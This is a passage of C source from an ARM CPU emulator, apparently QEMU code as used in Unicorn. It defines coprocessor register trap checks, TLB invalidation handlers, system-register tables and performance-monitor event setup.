!arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TDOSA)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } /* Check for traps to "debug ROM" registers, which are controlled * by MDCR_EL2.TDRA for EL2 but by the more general MDCR_EL3.TDA for EL3. */ static CPAccessResult access_tdra(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); bool mdcr_el2_tdra = (env->cp15.mdcr_el2 & MDCR_TDRA) || (env->cp15.mdcr_el2 & MDCR_TDE) || (arm_hcr_el2_eff(env) & HCR_TGE); if (el < 2 && mdcr_el2_tdra && !arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TDA)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } /* Check for traps to general debug registers, which are controlled * by MDCR_EL2.TDA for EL2 and MDCR_EL3.TDA for EL3. */ static CPAccessResult access_tda(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); bool mdcr_el2_tda = (env->cp15.mdcr_el2 & MDCR_TDA) || (env->cp15.mdcr_el2 & MDCR_TDE) || (arm_hcr_el2_eff(env) & HCR_TGE); if (el < 2 && mdcr_el2_tda && !arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TDA)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } /* Check for traps to performance monitor registers, which are controlled * by MDCR_EL2.TPM for EL2 and MDCR_EL3.TPM for EL3. */ static CPAccessResult access_tpm(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int el = arm_current_el(env); if (el < 2 && (env->cp15.mdcr_el2 & MDCR_TPM) && !arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TPM)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } /* Check for traps from EL1 due to HCR_EL2.TVM and HCR_EL2.TRVM. */ static CPAccessResult access_tvm_trvm(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1) { uint64_t trap = isread ? HCR_TRVM : HCR_TVM; if (arm_hcr_el2_eff(env) & trap) { return CP_ACCESS_TRAP_EL2; } } return CP_ACCESS_OK; } /* Check for traps from EL1 due to HCR_EL2.TSW. */ static CPAccessResult access_tsw(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TSW)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } /* Check for traps from EL1 due to HCR_EL2.TACR. */ static CPAccessResult access_tacr(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TACR)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } /* Check for traps from EL1 due to HCR_EL2.TTLB. 
*/ static CPAccessResult access_ttlb(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 1 && (arm_hcr_el2_eff(env) & HCR_TTLB)) { return CP_ACCESS_TRAP_EL2; } return CP_ACCESS_OK; } static void dacr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); raw_write(env, ri, value); tlb_flush(CPU(cpu)); /* Flush TLB as domain not tracked in TLB */ } static void fcse_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); if (raw_read(env, ri) != value) { /* Unlike real hardware the qemu TLB uses virtual addresses, * not modified virtual addresses, so this causes a TLB flush. */ tlb_flush(CPU(cpu)); raw_write(env, ri, value); } } static void contextidr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); if (raw_read(env, ri) != value && !arm_feature(env, ARM_FEATURE_PMSA) && !extended_addresses_enabled(env)) { /* For VMSA (when not using the LPAE long descriptor page table * format) this register includes the ASID, so do a TLB flush. * For PMSA it is purely a process ID and no action is needed. */ tlb_flush(CPU(cpu)); } raw_write(env, ri, value); } /* IS variants of TLB operations must affect all cores */ static void tlbiall_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_all_cpus_synced(cs); } static void tlbiasid_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_all_cpus_synced(cs); } static void tlbimva_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { struct uc_struct *uc = env->uc; CPUState *cs = env_cpu(env); tlb_flush_page_all_cpus_synced(cs, value & TARGET_PAGE_MASK); } static void tlbimvaa_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { struct uc_struct *uc = env->uc; CPUState *cs = env_cpu(env); tlb_flush_page_all_cpus_synced(cs, value & TARGET_PAGE_MASK); } /* * Non-IS variants of TLB operations are upgraded to * IS versions if we are at NS EL1 and HCR_EL2.FB is set to * force broadcast of these operations. 
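 *
 * HCR_EL2.FB is the "force broadcast" bit: when it is set, TLB
 * maintenance performed at Non-secure EL1 must behave as the Inner
 * Shareable (broadcast) form of the operation. The writefns below all
 * share the same dispatch shape, sketched here:
 *
 *   if (tlb_force_broadcast(env)) {
 *       tlb_flush_page_all_cpus_synced(cs, value);  // IS behaviour
 *   } else {
 *       tlb_flush_page(cs, value);                  // local core only
 *   }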
 */
static bool tlb_force_broadcast(CPUARMState *env)
{
    return (env->cp15.hcr_el2 & HCR_FB) &&
        arm_current_el(env) == 1 && !arm_is_secure_below_el3(env);
}

static void tlbiall_write(CPUARMState *env, const ARMCPRegInfo *ri,
                          uint64_t value)
{
    /* Invalidate all (TLBIALL) */
    CPUState *cs = env_cpu(env);

    if (tlb_force_broadcast(env)) {
        tlb_flush_all_cpus_synced(cs);
    } else {
        tlb_flush(cs);
    }
}

static void tlbimva_write(CPUARMState *env, const ARMCPRegInfo *ri,
                          uint64_t value)
{
    struct uc_struct *uc = env->uc;
    /* Invalidate single TLB entry by MVA and ASID (TLBIMVA) */
    CPUState *cs = env_cpu(env);

    value &= TARGET_PAGE_MASK;
    if (tlb_force_broadcast(env)) {
        tlb_flush_page_all_cpus_synced(cs, value);
    } else {
        tlb_flush_page(cs, value);
    }
}

static void tlbiasid_write(CPUARMState *env, const ARMCPRegInfo *ri,
                           uint64_t value)
{
    /* Invalidate by ASID (TLBIASID) */
    CPUState *cs = env_cpu(env);

    if (tlb_force_broadcast(env)) {
        tlb_flush_all_cpus_synced(cs);
    } else {
        tlb_flush(cs);
    }
}

static void tlbimvaa_write(CPUARMState *env, const ARMCPRegInfo *ri,
                           uint64_t value)
{
    struct uc_struct *uc = env->uc;
    /* Invalidate single entry by MVA, all ASIDs (TLBIMVAA) */
    CPUState *cs = env_cpu(env);

    value &= TARGET_PAGE_MASK;
    if (tlb_force_broadcast(env)) {
        tlb_flush_page_all_cpus_synced(cs, value);
    } else {
        tlb_flush_page(cs, value);
    }
}

static void tlbiall_nsnh_write(CPUARMState *env, const ARMCPRegInfo *ri,
                               uint64_t value)
{
    CPUState *cs = env_cpu(env);

    tlb_flush_by_mmuidx(cs,
                        ARMMMUIdxBit_E10_1 |
                        ARMMMUIdxBit_E10_1_PAN |
                        ARMMMUIdxBit_E10_0 |
                        ARMMMUIdxBit_Stage2);
}

static void tlbiall_nsnh_is_write(CPUARMState *env, const ARMCPRegInfo *ri,
                                  uint64_t value)
{
    CPUState *cs = env_cpu(env);

    tlb_flush_by_mmuidx_all_cpus_synced(cs,
                                        ARMMMUIdxBit_E10_1 |
                                        ARMMMUIdxBit_E10_1_PAN |
                                        ARMMMUIdxBit_E10_0 |
                                        ARMMMUIdxBit_Stage2);
}

static void tlbiipas2_write(CPUARMState *env, const ARMCPRegInfo *ri,
                            uint64_t value)
{
    /* Invalidate by IPA. This has to invalidate any structures that
     * contain only stage 2 translation information, but does not need
     * to apply to structures that contain combined stage 1 and stage 2
     * translation information.
     * This must NOP if EL2 isn't implemented or SCR_EL3.NS is zero.
*/ CPUState *cs = env_cpu(env); uint64_t pageaddr; if (!arm_feature(env, ARM_FEATURE_EL2) || !(env->cp15.scr_el3 & SCR_NS)) { return; } pageaddr = sextract64(value << 12, 0, 40); tlb_flush_page_by_mmuidx(cs, pageaddr, ARMMMUIdxBit_Stage2); } static void tlbiipas2_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr; if (!arm_feature(env, ARM_FEATURE_EL2) || !(env->cp15.scr_el3 & SCR_NS)) { return; } pageaddr = sextract64(value << 12, 0, 40); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_Stage2); } static void tlbiall_hyp_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_by_mmuidx(cs, ARMMMUIdxBit_E2); } static void tlbiall_hyp_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, ARMMMUIdxBit_E2); } static void tlbimva_hyp_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr = value & ~MAKE_64BIT_MASK(0, 12); tlb_flush_page_by_mmuidx(cs, pageaddr, ARMMMUIdxBit_E2); } static void tlbimva_hyp_is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr = value & ~MAKE_64BIT_MASK(0, 12); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_E2); } static const ARMCPRegInfo cp_reginfo[] = { /* Define the secure and non-secure FCSE identifier CP registers * separately because there is no secure bank in V8 (no _EL3). This allows * the secure register to be properly reset and migrated. There is also no * v8 EL1 version of the register so the non-secure instance stands alone. */ { .name = "FCSEIDR", .cp = 15, .opc1 = 0, .crn = 13, .crm = 0, .opc2 = 0, .access = PL1_RW, .secure = ARM_CP_SECSTATE_NS, .fieldoffset = offsetof(CPUARMState, cp15.fcseidr_ns), .resetvalue = 0, .writefn = fcse_write, .raw_writefn = raw_write, }, { .name = "FCSEIDR_S", .cp = 15, .opc1 = 0, .crn = 13, .crm = 0, .opc2 = 0, .access = PL1_RW, .secure = ARM_CP_SECSTATE_S, .fieldoffset = offsetof(CPUARMState, cp15.fcseidr_s), .resetvalue = 0, .writefn = fcse_write, .raw_writefn = raw_write, }, /* Define the secure and non-secure context identifier CP registers * separately because there is no secure bank in V8 (no _EL3). This allows * the secure register to be properly reset and migrated. In the * non-secure case, the 32-bit register will have reset and migration * disabled during registration as it is handled by the 64-bit instance. */ { .name = "CONTEXTIDR_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 13, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .secure = ARM_CP_SECSTATE_NS, .fieldoffset = offsetof(CPUARMState, cp15.contextidr_el[1]), .resetvalue = 0, .writefn = contextidr_write, .raw_writefn = raw_write, }, { .name = "CONTEXTIDR_S", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 0, .crn = 13, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .secure = ARM_CP_SECSTATE_S, .fieldoffset = offsetof(CPUARMState, cp15.contextidr_s), .resetvalue = 0, .writefn = contextidr_write, .raw_writefn = raw_write, }, REGINFO_SENTINEL }; static const ARMCPRegInfo not_v8_cp_reginfo[] = { /* NB: Some of these registers exist in v8 but with more precise * definitions that don't use CP_ANY wildcards (mostly in v8_cp_reginfo[]). 
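 *
 * CP_ANY is a wildcard for the crn/crm/opc1/opc2 fields: a single
 * ARMCPRegInfo entry with, e.g., .crm = CP_ANY matches every crm
 * encoding. The DACR entry below therefore covers all
 * MCR/MRC p15, <opc1>, Rt, c3, <crm>, <opc2> encodings with one
 * definition.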
*/ /* MMU Domain access control / MPU write buffer control */ { .name = "DACR", .cp = 15, .opc1 = CP_ANY, .crn = 3, .crm = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .accessfn = access_tvm_trvm, .resetvalue = 0, .writefn = dacr_write, .raw_writefn = raw_write, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.dacr_s), offsetoflow32(CPUARMState, cp15.dacr_ns) } }, /* ARMv7 allocates a range of implementation defined TLB LOCKDOWN regs. * For v6 and v5, these mappings are overly broad. */ { .name = "TLB_LOCKDOWN", .cp = 15, .crn = 10, .crm = 0, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "TLB_LOCKDOWN", .cp = 15, .crn = 10, .crm = 1, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "TLB_LOCKDOWN", .cp = 15, .crn = 10, .crm = 4, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "TLB_LOCKDOWN", .cp = 15, .crn = 10, .crm = 8, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_NOP }, /* Cache maintenance ops; some of this space may be overridden later. */ { .name = "CACHEMAINT", .cp = 15, .crn = 7, .crm = CP_ANY, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_W, .type = ARM_CP_NOP | ARM_CP_OVERRIDE }, REGINFO_SENTINEL }; static const ARMCPRegInfo not_v6_cp_reginfo[] = { /* Not all pre-v6 cores implemented this WFI, so this is slightly * over-broad. */ { .name = "WFI_v5", .cp = 15, .crn = 7, .crm = 8, .opc1 = 0, .opc2 = 2, .access = PL1_W, .type = ARM_CP_WFI }, REGINFO_SENTINEL }; static const ARMCPRegInfo not_v7_cp_reginfo[] = { /* Standard v6 WFI (also used in some pre-v6 cores); not in v7 (which * is UNPREDICTABLE; we choose to NOP as most implementations do). */ { .name = "WFI_v6", .cp = 15, .crn = 7, .crm = 0, .opc1 = 0, .opc2 = 4, .access = PL1_W, .type = ARM_CP_WFI }, /* L1 cache lockdown. Not architectural in v6 and earlier but in practice * implemented in 926, 946, 1026, 1136, 1176 and 11MPCore. StrongARM and * OMAPCP will override this space. */ { .name = "DLOCKDOWN", .cp = 15, .crn = 9, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c9_data), .resetvalue = 0 }, { .name = "ILOCKDOWN", .cp = 15, .crn = 9, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c9_insn), .resetvalue = 0 }, /* v6 doesn't have the cache ID registers but Linux reads them anyway */ { .name = "DUMMY", .cp = 15, .crn = 0, .crm = 0, .opc1 = 1, .opc2 = CP_ANY, .access = PL1_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = 0 }, /* We don't implement pre-v7 debug but most CPUs had at least a DBGDIDR; * implementing it as RAZ means the "debug architecture version" bits * will read as a reserved value, which should cause Linux to not try * to use the debug hardware. */ { .name = "DBGDIDR", .cp = 14, .crn = 0, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL0_R, .type = ARM_CP_CONST, .resetvalue = 0 }, /* MMU TLB control. Note that the wildcarding means we cover not just * the unified TLB ops but also the dside/iside/inner-shareable variants. 
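 *
 * Concretely, the explicit v7 definitions later in this file place the
 * I-side ops at c8,c5, the D-side ops at c8,c6 and the unified ops at
 * c8,c7 (plus the Inner Shareable forms at c8,c3), so the single
 * wildcard entries below with .crm = CP_ANY match all of them at once.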
*/ { .name = "TLBIALL", .cp = 15, .crn = 8, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = 0, .access = PL1_W, .writefn = tlbiall_write, .type = ARM_CP_NO_RAW }, { .name = "TLBIMVA", .cp = 15, .crn = 8, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = 1, .access = PL1_W, .writefn = tlbimva_write, .type = ARM_CP_NO_RAW }, { .name = "TLBIASID", .cp = 15, .crn = 8, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = 2, .access = PL1_W, .writefn = tlbiasid_write, .type = ARM_CP_NO_RAW }, { .name = "TLBIMVAA", .cp = 15, .crn = 8, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = 3, .access = PL1_W, .writefn = tlbimvaa_write, .type = ARM_CP_NO_RAW }, { .name = "PRRR", .cp = 15, .crn = 10, .crm = 2, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "NMRR", .cp = 15, .crn = 10, .crm = 2, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .type = ARM_CP_NOP }, REGINFO_SENTINEL }; static void cpacr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { uint32_t mask = 0; /* In ARMv8 most bits of CPACR_EL1 are RES0. */ if (!arm_feature(env, ARM_FEATURE_V8)) { /* ARMv7 defines bits for unimplemented coprocessors as RAZ/WI. * ASEDIS [31] and D32DIS [30] are both UNK/SBZP without VFP. * TRCDIS [28] is RAZ/WI since we do not implement a trace macrocell. */ if (cpu_isar_feature(aa32_vfp_simd, env_archcpu(env))) { /* VFP coprocessor: cp10 & cp11 [23:20] */ mask |= (1UL << 31) | (1 << 30) | (0xf << 20); if (!arm_feature(env, ARM_FEATURE_NEON)) { /* ASEDIS [31] bit is RAO/WI */ value |= (1UL << 31); } /* VFPv3 and upwards with NEON implement 32 double precision * registers (D0-D31). */ if (!cpu_isar_feature(aa32_simd_r32, env_archcpu(env))) { /* D32DIS [30] is RAO/WI if D16-31 are not implemented. */ value |= (1 << 30); } } value &= mask; } /* * For A-profile AArch32 EL3 (but not M-profile secure mode), if NSACR.CP10 * is 0 then CPACR.{CP11,CP10} ignore writes and read as 0b00. */ if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !arm_is_secure(env) && !extract32(env->cp15.nsacr, 10, 1)) { value &= ~(0xf << 20); value |= env->cp15.cpacr_el1 & (0xf << 20); } env->cp15.cpacr_el1 = value; } static uint64_t cpacr_read(CPUARMState *env, const ARMCPRegInfo *ri) { /* * For A-profile AArch32 EL3 (but not M-profile secure mode), if NSACR.CP10 * is 0 then CPACR.{CP11,CP10} ignore writes and read as 0b00. */ uint64_t value = env->cp15.cpacr_el1; if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !arm_is_secure(env) && !extract32(env->cp15.nsacr, 10, 1)) { value &= ~(0xf << 20); } return value; } static void cpacr_reset(CPUARMState *env, const ARMCPRegInfo *ri) { /* Call cpacr_write() so that we reset with the correct RAO bits set * for our CPU features. 
*/ cpacr_write(env, ri, 0); } static CPAccessResult cpacr_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_feature(env, ARM_FEATURE_V8)) { /* Check if CPACR accesses are to be trapped to EL2 */ if (arm_current_el(env) == 1 && (env->cp15.cptr_el[2] & CPTR_TCPAC) && !arm_is_secure(env)) { return CP_ACCESS_TRAP_EL2; /* Check if CPACR accesses are to be trapped to EL3 */ } else if (arm_current_el(env) < 3 && (env->cp15.cptr_el[3] & CPTR_TCPAC)) { return CP_ACCESS_TRAP_EL3; } } return CP_ACCESS_OK; } static CPAccessResult cptr_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* Check if CPTR accesses are set to trap to EL3 */ if (arm_current_el(env) == 2 && (env->cp15.cptr_el[3] & CPTR_TCPAC)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } static const ARMCPRegInfo v6_cp_reginfo[] = { /* prefetch by MVA in v6, NOP in v7 */ { .name = "MVA_prefetch", .cp = 15, .crn = 7, .crm = 13, .opc1 = 0, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NOP }, /* We need to break the TB after ISB to execute self-modifying code * correctly and also to take any pending interrupts immediately. * So use arm_cp_write_ignore() function instead of ARM_CP_NOP flag. */ { .name = "ISB", .cp = 15, .crn = 7, .crm = 5, .opc1 = 0, .opc2 = 4, .access = PL0_W, .type = ARM_CP_NO_RAW, .writefn = arm_cp_write_ignore }, { .name = "DSB", .cp = 15, .crn = 7, .crm = 10, .opc1 = 0, .opc2 = 4, .access = PL0_W, .type = ARM_CP_NOP }, { .name = "DMB", .cp = 15, .crn = 7, .crm = 10, .opc1 = 0, .opc2 = 5, .access = PL0_W, .type = ARM_CP_NOP }, { .name = "IFAR", .cp = 15, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .accessfn = access_tvm_trvm, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ifar_s), offsetof(CPUARMState, cp15.ifar_ns) }, .resetvalue = 0, }, /* Watchpoint Fault Address Register : should actually only be present * for 1136, 1176, 11MPCore. */ { .name = "WFAR", .cp = 15, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0, }, { .name = "CPACR", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 1, .crm = 0, .opc1 = 0, .opc2 = 2, .accessfn = cpacr_access, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.cpacr_el1), .resetfn = cpacr_reset, .writefn = cpacr_write, .readfn = cpacr_read }, REGINFO_SENTINEL }; /* Definitions for the PMU registers */ #define PMCRN_MASK 0xf800 #define PMCRN_SHIFT 11 #define PMCRLC 0x40 #define PMCRDP 0x20 #define PMCRX 0x10 #define PMCRD 0x8 #define PMCRC 0x4 #define PMCRP 0x2 #define PMCRE 0x1 /* * Mask of PMCR bits writeable by guest (not including WO bits like C, P, * which can be written as 1 to trigger behaviour but which stay RAZ). 
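 *
 * For example, writing PMCR with the C bit (0x4) set makes pmcr_write()
 * below clear PMCCNTR as a side effect, but since C is not in this mask
 * the bit itself is never stored and always reads back as zero.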
*/ #define PMCR_WRITEABLE_MASK (PMCRLC | PMCRDP | PMCRX | PMCRD | PMCRE) #define PMXEVTYPER_P 0x80000000 #define PMXEVTYPER_U 0x40000000 #define PMXEVTYPER_NSK 0x20000000 #define PMXEVTYPER_NSU 0x10000000 #define PMXEVTYPER_NSH 0x08000000 #define PMXEVTYPER_M 0x04000000 #define PMXEVTYPER_MT 0x02000000 #define PMXEVTYPER_EVTCOUNT 0x0000ffff #define PMXEVTYPER_MASK (PMXEVTYPER_P | PMXEVTYPER_U | PMXEVTYPER_NSK | \ PMXEVTYPER_NSU | PMXEVTYPER_NSH | \ PMXEVTYPER_M | PMXEVTYPER_MT | \ PMXEVTYPER_EVTCOUNT) #define PMCCFILTR 0xf8000000 #define PMCCFILTR_M PMXEVTYPER_M #define PMCCFILTR_EL0 (PMCCFILTR | PMCCFILTR_M) static inline uint32_t pmu_num_counters(CPUARMState *env) { return (env->cp15.c9_pmcr & PMCRN_MASK) >> PMCRN_SHIFT; } /* Bits allowed to be set/cleared for PMCNTEN* and PMINTEN* */ static inline uint64_t pmu_counter_mask(CPUARMState *env) { return (1 << 31) | ((1 << pmu_num_counters(env)) - 1); } typedef struct pm_event { uint16_t number; /* PMEVTYPER.evtCount is 16 bits wide */ /* If the event is supported on this CPU (used to generate PMCEID[01]) */ bool (*supported)(CPUARMState *); /* * Retrieve the current count of the underlying event. The programmed * counters hold a difference from the return value from this function */ uint64_t (*get_count)(CPUARMState *); /* * Return how many nanoseconds it will take (at a minimum) for count events * to occur. A negative value indicates the counter will never overflow, or * that the counter has otherwise arranged for the overflow bit to be set * and the PMU interrupt to be raised on overflow. */ int64_t (*ns_per_count)(uint64_t); } pm_event; static bool event_always_supported(CPUARMState *env) { return true; } static uint64_t swinc_get_count(CPUARMState *env) { /* * SW_INCR events are written directly to the pmevcntr's by writes to * PMSWINC, so there is no underlying count maintained by the PMU itself */ return 0; } static int64_t swinc_ns_per(uint64_t ignored) { return -1; } /* * Return the underlying cycle count for the PMU cycle counters. If we're in * usermode, simply return 0. 
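 * (Worked through: with ARM_CPU_FREQ fixed at 1 GHz, the muldiv64()
 * below multiplies QEMU_CLOCK_VIRTUAL nanoseconds by 10^9/10^9, so one
 * emulated cycle elapses per nanosecond of virtual time; 1500 ns reads
 * back as a count of 1500. Changing ARM_CPU_FREQ simply rescales this.)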
 */
static uint64_t cycles_get_count(CPUARMState *env)
{
    return muldiv64(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL),
                    ARM_CPU_FREQ, NANOSECONDS_PER_SECOND);
}

static int64_t cycles_ns_per(uint64_t cycles)
{
    return (ARM_CPU_FREQ / NANOSECONDS_PER_SECOND) * cycles;
}

static bool instructions_supported(CPUARMState *env)
{
    return false;
}

static uint64_t instructions_get_count(CPUARMState *env)
{
    return 0;
}

static int64_t instructions_ns_per(uint64_t icount)
{
    return cpu_icount_to_ns((int64_t)icount);
}

static bool pmu_8_1_events_supported(CPUARMState *env)
{
    /* For events which are supported in any v8.1 PMU */
    return cpu_isar_feature(any_pmu_8_1, env_archcpu(env));
}

static bool pmu_8_4_events_supported(CPUARMState *env)
{
    /* For events which are supported in any v8.4 PMU */
    return cpu_isar_feature(any_pmu_8_4, env_archcpu(env));
}

static uint64_t zero_event_get_count(CPUARMState *env)
{
    /* For events which on QEMU never fire, so their count is always zero */
    return 0;
}

static int64_t zero_event_ns_per(uint64_t cycles)
{
    /* An event which never fires can never overflow */
    return -1;
}

static const pm_event pm_events[] = {
    { .number = 0x000, /* SW_INCR */
      .supported = event_always_supported,
      .get_count = swinc_get_count,
      .ns_per_count = swinc_ns_per,
    },
    { .number = 0x008, /* INST_RETIRED, Instruction architecturally executed */
      .supported = instructions_supported,
      .get_count = instructions_get_count,
      .ns_per_count = instructions_ns_per,
    },
    { .number = 0x011, /* CPU_CYCLES, Cycle */
      .supported = event_always_supported,
      .get_count = cycles_get_count,
      .ns_per_count = cycles_ns_per,
    },
    { .number = 0x023, /* STALL_FRONTEND */
      .supported = pmu_8_1_events_supported,
      .get_count = zero_event_get_count,
      .ns_per_count = zero_event_ns_per,
    },
    { .number = 0x024, /* STALL_BACKEND */
      .supported = pmu_8_1_events_supported,
      .get_count = zero_event_get_count,
      .ns_per_count = zero_event_ns_per,
    },
    { .number = 0x03c, /* STALL */
      .supported = pmu_8_4_events_supported,
      .get_count = zero_event_get_count,
      .ns_per_count = zero_event_ns_per,
    },
};

/*
 * Note: Before increasing MAX_EVENT_ID beyond 0x3f into the 0x40xx range of
 * events (i.e. the statistical profiling extension), this implementation
 * should first be updated to something sparse instead of the current
 * supported_event_map[] array.
 */
#define MAX_EVENT_ID 0x3c
#define UNSUPPORTED_EVENT UINT16_MAX
static uint16_t supported_event_map[MAX_EVENT_ID + 1];

/*
 * Called upon CPU initialization to initialize PMCEID[01]_EL0 and build a map
 * of ARM event numbers to indices in our pm_events array.
 *
 * Note: Events in the 0x40XX range are not currently supported.
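 *
 * As a worked example of the mapping built below: event 0x011
 * (CPU_CYCLES) has its pm_events[] index recorded in
 * supported_event_map[0x011] and, because 0x011 < 0x20, contributes
 * bit 17 (0x11 & 0x1f) to PMCEID0; event 0x023 (STALL_FRONTEND) has
 * bit 5 set in its number, so when supported it instead contributes
 * bit 3 (0x23 & 0x1f) to PMCEID1.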
*/ void pmu_init(ARMCPU *cpu) { unsigned int i; /* * Empty supported_event_map and cpu->pmceid[01] before adding supported * events to them */ for (i = 0; i < ARRAY_SIZE(supported_event_map); i++) { supported_event_map[i] = UNSUPPORTED_EVENT; } cpu->pmceid0 = 0; cpu->pmceid1 = 0; for (i = 0; i < ARRAY_SIZE(pm_events); i++) { const pm_event *cnt = &pm_events[i]; assert(cnt->number <= MAX_EVENT_ID); /* We do not currently support events in the 0x40xx range */ assert(cnt->number <= 0x3f); if (cnt->supported(&cpu->env)) { supported_event_map[cnt->number] = i; uint64_t event_mask = 1ULL << (cnt->number & 0x1f); if (cnt->number & 0x20) { cpu->pmceid1 |= event_mask; } else { cpu->pmceid0 |= event_mask; } } } } /* * Check at runtime whether a PMU event is supported for the current machine */ static bool event_supported(uint16_t number) { if (number > MAX_EVENT_ID) { return false; } return supported_event_map[number] != UNSUPPORTED_EVENT; } static CPAccessResult pmreg_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* Performance monitor registers user accessibility is controlled * by PMUSERENR. MDCR_EL2.TPM and MDCR_EL3.TPM allow configurable * trapping to EL2 or EL3 for other accesses. */ int el = arm_current_el(env); if (el == 0 && !(env->cp15.c9_pmuserenr & 1)) { return CP_ACCESS_TRAP; } if (el < 2 && (env->cp15.mdcr_el2 & MDCR_TPM) && !arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL2; } if (el < 3 && (env->cp15.mdcr_el3 & MDCR_TPM)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; } static CPAccessResult pmreg_access_xevcntr(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* ER: event counter read trap control */ if (arm_feature(env, ARM_FEATURE_V8) && arm_current_el(env) == 0 && (env->cp15.c9_pmuserenr & (1 << 3)) != 0 && isread) { return CP_ACCESS_OK; } return pmreg_access(env, ri, isread); } static CPAccessResult pmreg_access_swinc(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* SW: software increment write trap control */ if (arm_feature(env, ARM_FEATURE_V8) && arm_current_el(env) == 0 && (env->cp15.c9_pmuserenr & (1 << 1)) != 0 && !isread) { return CP_ACCESS_OK; } return pmreg_access(env, ri, isread); } static CPAccessResult 